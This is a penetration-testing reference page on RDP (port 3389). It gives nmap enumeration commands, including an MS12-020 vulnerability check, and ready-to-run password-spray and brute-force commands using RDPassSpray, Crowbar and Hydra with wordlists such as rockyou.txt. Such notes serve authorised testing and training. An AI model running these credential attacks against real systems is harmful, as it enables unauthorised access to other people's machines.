3389 - RDP

Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft which provides a user with a graphical interface to connect to another computer over a network connection.

A user need to be part of the "Remote Desktop Users" in order to login to the host via RDP.

Enumeration

Nmap

Find encryption type:

nmap -p 3389 --script rdp-enum-encryption <target>

Enumerates information from remote RDP services with CredSSP (NLA) authentication enabled:

nmap -p 3389 --script rdp-ntlm-info <target>

Check if vulnerable to MS12-020:

nmap -sV --script=rdp-vuln-ms12-020 -p 3389 <target>

Brute force access

RDPassSpray

RDPassSpary is a python tool to perform password spray attack in a Microsoft domain environment.

Link: https://github.com/xFreed0m/RDPassSpray

Usage:

python3 RDPassSpray.py -u [USERNAME] -p [PASSWORD] -d [DOMAIN] -t [TARGET IP]

Crowbar

Link: https://github.com/galkan/crowbar

./crowbar.py -b rdp -s 10.xx.xx.xx/32 -u sectest@TESTDOMAIN.local -C /root/Desktop/tests/hyda_rdp/rock.txt

Hydra:

hydra -t 1 -V -f -l administrator -P rockyou.txt rdp://192.168.1.1

Connect to RDP

Please see this section on how to connect

Previous3306 - MySQL Next5432 - PostgresSQL

Last updated 4 years ago